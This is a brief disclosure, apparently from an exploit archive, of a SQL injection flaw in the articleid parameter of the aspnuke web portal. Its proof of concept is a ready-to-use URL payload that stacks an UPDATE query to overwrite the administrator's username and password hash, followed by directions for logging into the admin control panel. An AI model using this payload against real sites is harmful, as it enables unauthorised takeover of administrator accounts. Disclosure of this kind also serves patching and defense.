*******description********* aspnuke is web portal system written in asp . site : www.aspnuke.com ********POC************ It's possible to inject htttp://host/module/article/article/article.asp?articleid=1' for example you can change the admin username and password with this querry : http://host/module/article/article/article.asp?articleid=1%20;%20update%20tbluser%20SET%20password='bf16c7ec063e8f1b62bf4ca831485ba0da56328f818763ed34c72ca96533802c' , username='trapset'%20where%20userID=1%20-- this will change both username and password to trapset and then you can login to the admin's conntrol panel from www.example.com/module/admin ******************** remember aspnuke is quiet diffrent from asp-nuke ******************** This bug discovered by oil_karchack